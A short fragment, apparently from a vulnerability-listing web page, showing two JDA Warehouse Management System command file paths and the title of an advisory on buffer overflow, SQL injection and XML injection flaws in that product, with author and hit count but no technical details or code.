./mtf/src/cmdsrc/mtfint/get_locale_for_warehouse.mcmd
get locale for warehouse
./mtf/src/cmdsrc/mtfint/list_rf_terminals.mcmd
list rf terminals
JDA Warehouse Management System Buffer Overflow SQL Injection XML Injection
- Details
- Written by: khalil shreateh
- Category: Vulnerabilities
- Hits: 330